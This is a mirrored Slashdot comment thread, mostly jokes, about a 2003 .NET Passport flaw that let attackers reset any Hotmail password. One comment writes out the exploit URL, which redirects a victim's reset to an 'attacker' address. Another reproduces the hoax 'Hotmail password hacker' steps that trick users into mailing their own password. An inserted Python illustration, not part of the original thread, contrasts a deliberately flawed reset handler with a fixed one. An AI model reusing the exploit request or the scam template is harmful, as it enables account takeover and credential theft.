Slashdot Mirror


Security Vulnerability in Microsoft .NET Passport

Stuart Moore writes "A vulnerability was reported in Microsoft .NET Passport, also affecting Hotmail user accounts. The simple flaw allows an attacker to change any person's password to an arbitrary value. The attacker can then gain access to the victim's accounts, as well as to the victim's personal information (if any is stored w/ Passport). Muhammad Faisal Rauf Danka posted a note to the Full-Disclosure security e-mail list after multiple unsuccessful attempts to contact Microsoft." There's a news report as well.

45 of 433 comments

  1. Remember... by stu_coates · · Score: 5, Funny

    Remember folks, this is Trustworthy Computing! ;-)

    1. Re:Remember... by rf0 · · Score: 3, Funny

      I wouldn't trust them to feed my fish.

      Rus

    2. Re:Remember... by Gortbusters.org · · Score: 5, Funny

      That's one degree of difference with .NET!

      --
      --------
      Free your mind.
    3. Re:Remember... by jkrise · · Score: 4, Funny

      " according to a dutch news site this hole was fixed shortly after the posting... "

      If sending 404 Page Not Found messages to users trying to update passwords can be called fixing, well, MS indeed fixed it.

      --
      If you keep throwing chairs, one day you'll break windows....
    4. Re:Remember... by mbourgon · · Score: 4, Funny

      MS has admitted that Trustworthy Computing has nothing to do with security. It's all about whether you trust Microsoft. Do you trust them enough to give them money? If so, they've met their goals.

      --
      "Sometimes a woman is a kind of religion, she can save your soul & set you free from all your sins" - Bad Examples
  2. Oh my God (Mad scramble) by LookSharp · · Score: 5, Funny

    Ahhh! I have to go change my Passport profile and take out all those credit cards I added, and transport those top-secret, mission critical emails and documents I have sitting in my Hotmail account!

    Why did I trust Microsoft with all of my personal secrets? They've had such great security in the past... /obvious

    1. Re:Oh my God (Mad scramble) by Anonymous Coward · · Score: 5, Funny

      I have to go change my Passport profile and take out all those credit cards I added, and transport those top-secret, mission critical emails and documents I have sitting in my Hotmail account!

      Don't bother, I just did it for you.

  3. As lame as it sounds... by Anonymous Coward · · Score: 5, Funny

    ...This could be a good thing for me. Back in the day, I had a really cool hotmail address, but I neglected it for a while and completely forgot the password. Since all my info was fake, I couldn't request a new password. Off to steal my own account....

  4. Security flaw in Passport!!!! by grahamlee · · Score: 5, Funny

    In other news, the world is round, Bill Gates is rich, twice two is four, and the England cricket team haven't won anything.

    1. Re:Security flaw in Passport!!!! by jkrise · · Score: 2, Funny

      "the England cricket team haven't won anything"

      I thought they won a moral victory by not travelling to Zimbabwe... and a political victory by making Zim fly to England. Bad example?

      --
      If you keep throwing chairs, one day you'll break windows....
    2. Re:Security flaw in Passport!!!! by rifter · · Score: 3, Funny

      twice two is four

      It seems you are overdue for your appointment at miniluv, thought criminal!

  5. The Microsoft Information Minister Says: by retards · · Score: 5, Funny

    We are secure! There are no security issues in our code. Truly. We shall beat Linux with our shoes and call it a donkey!

    1. Re:The Microsoft Information Minister Says: by Anonymous Coward · · Score: 0, Funny

      What's an AC?

      Air Conditioner. I don't think air conditioners are actually banned from moderating, but I've never heard of one that could.

  6. now be fair by Joe+the+Lesser · · Score: 4, Funny

    unsuccessful attempts to contact Microsoft.

    It's not their fault Outlook kept crashing, right?

    --
    "I only speak the truth"
    Karma: null(Mostly affected by an unassigned variable)
  7. Ruh Roh Raggy by Ralph+Wiggam · · Score: 4, Funny

    Holy Crap!

    If someone were to break into my Hotmail account they would find out all the secret ways that I make my penis and breasts larger.

    With .NET, there's only one degree of separation between me and evil crackers.

    -B

    1. Re:Ruh Roh Raggy by archen · · Score: 5, Funny

      If you have a penis AND breasts (and feel the need to enlarge them) you probably really do have a lot of secrets...

  8. good by Nevrar · · Score: 5, Funny

    "...the victim's accounts..."

    It's nice to see people are finally realising that Passport/Hotmail users are victims. ;)

    --
    Nevrar
  9. Oh no by Rik+Sweeney · · Score: 5, Funny

    A remote user can change an arbitrary target user's password to an arbitrary value and then access the target user's account

    But that spam is personal to me. It's not for anyone else.

  10. Finally... by rf0 · · Score: 2, Funny

    All those l33t hax0rs can now stop asking how to hack hotmail. The answer's right here (if it wasn't 404'd)

    Rus

  11. Well, at least now I know... by johannesg · · Score: 5, Funny

    ...where I don't want to go today.

    Perhaps we can take this opportunity to kill all those spam accounts on hotmail. All we need to do is reset all the passwords to impossible strings...

  12. Really tough fix by alteridem · · Score: 2, Funny

    Sounds like a really tough fix... Delete the offending page... "There, see, it's secure."

  13. Microsoft .NET Passport Passwords.. :-) by jkrise · · Score: 1, Funny

    Repeat this rapidly ten times, and watch your tongue get locked faster than Windows XP!!

    --
    If you keep throwing chairs, one day you'll break windows....
  14. Whoever has got... by archetypeone · · Score: 5, Funny

    victim@hotmail.com or attacker@attacker.com is going to be really pissed...

  15. Re:Can someone explain this? by Anonymous Coward · · Score: 5, Funny

    I believe that .NET was the cause of the .COM crash. The shit hit the fan around the same time. What a catalyst !

  16. Try stealing billgates@hotmail.com by jkrise · · Score: 2, Funny

    You could freak out with all his credit cards! Assuming he's got a good credit rating though :-(

    --
    If you keep throwing chairs, one day you'll break windows....
    1. Re:Try stealing billgates@hotmail.com by miscGeek · · Score: 1, Funny

      Even Billy Boy knows better than to trust M$ with his credit card information :)

      --
      May the source be with you!
    2. Re:Try stealing billgates@hotmail.com by rf0 · · Score: 3, Funny

      or just go for abuse@hotmail.com.

      Rus

    3. Re:Try stealing billgates@hotmail.com by Anonymous Coward · · Score: 3, Funny

      That reminds me of the time I and a friend noticed a free mail provider that had forgotten to reserve certain interesting (to say the least) addresses.

      I got webmaster@... and I believe my friend got administrator@...

      I don't know if my friend got any mail, but I got a lot of interesting messages until I got bored and stopped checking it :-)

      Now, before any of you start bashing me for being irresponsible, I did try to help out the users who sent me mail. Mostly I just told them who to really contact.

      I did get carried away a couple of times though. Once I decided to reply to a spam complaint and thanked them for the nice porn links they forwarded to me. They never responded, funny thing.

      (this posted anonymously for obvious reasons)

  17. Add one to the pile by Ashyukun · · Score: 5, Funny

    Yet another reason to be glad I ditched my Hotmail account and refuse to use Passport after Hotmail 'politely' informed me that my last name (the one I was born with) violated their offensive language filter and asked me to change my last name.

    1. Re:Add one to the pile by FauxPasIII · · Score: 3, Funny

      I think I speak for everyone here when I ask... What's your last name ?!

      --
      25% Funny, 25% Insightful, 25% Informative, 25% Troll
    2. Re:Add one to the pile by dubstop · · Score: 5, Funny

      That's how it starts.

      In fifty years time, when Microsoft are in charge of the planet, they won't be asking you to change your last name, they'll be telling you that they've already changed your entire name to a 256-character, globally unique identifier. For your convenience, of course, and at a very reasonable fee of M$50 (MicroSerfian dollaroonies), which, again for your convenience, they've already deducted from your (compulsory) Bank of Microsoft account. As a result of this unexpected deduction, your account will go M$1 overdrawn, and this will mean that they are entitled to immediate vacant possession of your home. When you query this, it will be pointed out that this entitlement was clearly detailed in 2-point font, on page 437 (that's about one-third of the way in) of the click-through agreement that you read, understood, and click-through-agreed to when opening your (compulsory) Bank of Microsoft account. At the time that this is pointed out, your attention will be drawn to the clause on page 442 that they are also entitled to one of every major organ that you have two of. This includes (but is not limited to) your lungs, kidneys and, at the discretion of the Microsoft legal department (formerly known as the US Department of Justice), your testicles. They will gladly help you to pay for the operation to remove these organs, by the extension of a small loan, repayable in 7200 monthly payments that, for your convenience, will exactly match your monthly salary. You will be responsible for the shipping of at least two of your children to the secure holding facility at Redmond, where they will be held as collateral for the duration of the loan.

      Where do you want to go today?

    3. Re:Add one to the pile by pcardoso · · Score: 3, Funny

      funny... I just had the same problem while registering a hotmail account for my girlfriend to use, so we could IM each other... most of our contacts are MSN addresses, so Windows Messenger was the best choice. I don't like that much, but what the hell! Gaim has no problems with that..

      Back to the topic, her name is Ana Luisa and guess what happens when you concatenate her first two names together! It was getting on my nerves to receive an error message because of some issue with the username (but not an existing username, oddly)... It was only after a lot of attempts that I noticed the first 4 chars of the username... Added an underscore and it was all ok...

  18. Re:FUD by Bendy+Chief · · Score: 1, Funny

    This, friend, is why I write my passwords on all my personal effects!

    It's handy-dandy, and I've never had a probASDFK6GJL45SDJ6G-CARRIER LOST-

  19. Re:How do you contact Microsoft? by PerryMason · · Score: 4, Funny

    Do they actually have a procedure to inform them when things are broken?

    As far as I'm aware, they have a guy who just keeps clicking reload on the /. front page waiting for a new MS vulnerability story to pop up. They tried the same thing with Bugtraq but there were just way too many vulnerabilities for the poor guy to keep up.

    --
    "I'm tired of all this 'Aren't humanity great' bullshit. We're a virus with shoes" - Bill Hicks
  20. Funny stuff by Anonymous Coward · · Score: 2, Funny

    From the passport.net page, in a big green box, under the title "SECURITY", it reads:

    Sign in on any computer that has Internet access. .NET Passport uses powerful online security technology and follows a comprehensive privacy policy to help protect your profile information. You manage your information-sharing options.

  21. Could be worse... by Ratface · · Score: 1, Funny

    They could fix it by making it impossible to enter arbitrary URLs in the next version of Internet Explorer :-D

    --

    A little planning goes a long way...
  22. Re:Oh no, not again... by Anonymous Coward · · Score: 1, Funny

    Microsoft hires only "geniuses", i.e., no common sense whatever!

  23. Re:FUD by mulhall · · Score: 2, Funny

    You seem to be under the impression that legitimate users actually change their passwords - what planet are you living on?!

  24. Re:Can someone explain this? by Kredal · · Score: 2, Funny

    So if I start the .ORG service, can I kill the .NET system?

    So who wants to join the .ORG at my place next friday? (:

    --
    Whoever stated that signature sizes should be limited to one hundred and twenty characters can just go ahead and kiss my
  25. Re:FUD by Exedore · · Score: 4, Funny

    Mechanic: We fixed your brakes... they no longer make that awful screeching sound.
    Me: Thanks. How did you fix them?
    Mechanic: We removed the brakes entirely
    Me: What the...
    Mechanic: That will be $567.98, please.

    --

    I take drugs seriously.

  26. Re:Oh my God (MS explains it all..) by jkrise · · Score: 4, Funny

    It seems that all Passport Update Services have been disabled, owing to millions of user complaints about spam! All mail accounts will need to be checked manually for spam. (all software MS Junk mail filters etc. have been junked already).

    Of course, this means that Full Control of user accounts is needed. The process of manually checking every single mail account for spam is underway. When all the billion accounts are checked and spam deleted, Passport .Net will be re-activated.

    This is the beginning of the Passport Update Synchronized Service Year (PUSSY) efforts. Thanks for your attention.

    --
    If you keep throwing chairs, one day you'll break windows....
  27. Another Hotmail Password Hack found on Kazaa by doublem · · Score: 5, Funny

    Hotmail password hacker.doc

    THIS IS HOW TO HACK ANYONE'S HOTMAIL PASSWORD

    Step 1:
    send a mail to Robot_pass_finder@hotmail.com with PW: fetchpass in the subject line

    Step 2: The email body
    In the first line: put the complete email address of the user whose password you want.

    In the 5th line, type the email address and the login (pass) you want the password sent to,
    here is an example:

    To: Robot_pass_finder@hotmail.com
    Subject: PW: fetchpass
    CC.________________ BCC.___________________
    =-email body-=

    address@hotmail.com

    your email address here example.: myemail@hotmail.com
    your pass here example.: mypassword

    --
    "Live Free or Die." Don't like it? Then keep out of the USA
  28. The problem with global accounts like Passport by Jugalator · · Score: 2, Funny

    One Company to rule them all
    One Hacker to find them
    One Exploit to bring them all
    to the attacker's power

    --
    Beware: In C++, your friends can see your privates!
  29. Re:What breed of idiot are you? by Dark+Lord+Seth · · Score: 2, Funny

    lynx -head -source --mime-header 'https://register.passport.net/emailpwdreset.srf?lc=1033&em=victim@hotmail.com&id=&cb=&prefem=attacker@attacker.com&rst=1'

    HTTP/1.1 404 Not Found
    Server: Apache/2.0.43 (Unix)
    Date: Thu, 08 May 2003 13:10:14 GMT
    PPServer: H: LAWPPREGU4A002

    This would be a lot more fun to see though...
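As an added illustration (not code from this thread or from Passport itself), the reset flow quoted in the command above modelled two ways in Python: a handler that, like the reported flaw, lets a caller-supplied `prefem` parameter choose where the reset token is mailed, and a hardened one that mails only the address on file and issues single-use, expiring tokens. The account data, outbox and token store are constructed; only the `em` and `prefem` parameter names come from the quoted URL.

```python
import secrets
import time
from dataclasses import dataclass
from typing import Optional

@dataclass
class Account:
    email: str      # address on file: the only place a reset token may be delivered
    password: str

# Constructed sample state: one account, a per-address outbox, and issued tokens.
ACCOUNTS = {"victim@hotmail.com": Account("victim@hotmail.com", "hunter2")}
OUTBOX: dict = {}
TOKENS: dict = {}            # token -> (account email, expiry time)
TOKEN_TTL = 15 * 60          # seconds a reset token stays valid

def send_mail(to: str, body: str) -> None:
    OUTBOX.setdefault(to, []).append(body)

def reset_flawed(params: dict) -> str:
    """Mirrors the reported flaw: 'prefem' from the query string picks the recipient."""
    acct = ACCOUNTS[params["em"]]
    token = secrets.token_urlsafe(16)
    TOKENS[token] = (acct.email, time.time() + TOKEN_TTL)
    dest = params.get("prefem") or acct.email      # attacker-controlled destination
    send_mail(dest, f"reset token for {acct.email}: {token}")
    return dest

def reset_fixed(params: dict) -> Optional[str]:
    """Ignores any caller-supplied destination; mails only the address on file."""
    acct = ACCOUNTS.get(params.get("em", ""))
    if acct is None:
        return None          # the HTTP reply should look identical in both cases
    token = secrets.token_urlsafe(16)
    TOKENS[token] = (acct.email, time.time() + TOKEN_TTL)
    send_mail(acct.email, f"reset token for {acct.email}: {token}")
    return acct.email

def complete_reset(token: str, new_password: str) -> bool:
    """Consumes a single-use, time-limited token and changes only its owner's password."""
    entry = TOKENS.pop(token, None)   # pop: a token is spent on first use
    if entry is None or entry[1] < time.time():
        return False
    ACCOUNTS[entry[0]].password = new_password
    return True
```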

  30. *Sigh* by White+Roses · · Score: 2, Funny

    The unfortunate thing is that I don't know anyone who is both (a) stupid enough to use Hotmail and (b) grotesquely stupid enough to store personal information in Passport.

    I need to make some stupid friends, it seems. Well, friends who are more stupid than the ones I have now, at any rate.

    But it's a good exploit, anyway. Kudos to the person who slaved for almost 15 minutes to figure it out (that's not a slander against the cracker in question, but against the pathetic sec- . . . secuuu- . . . jeez, I can't even call it what MS wants me to think it is).

    --
    Do not touch -Willie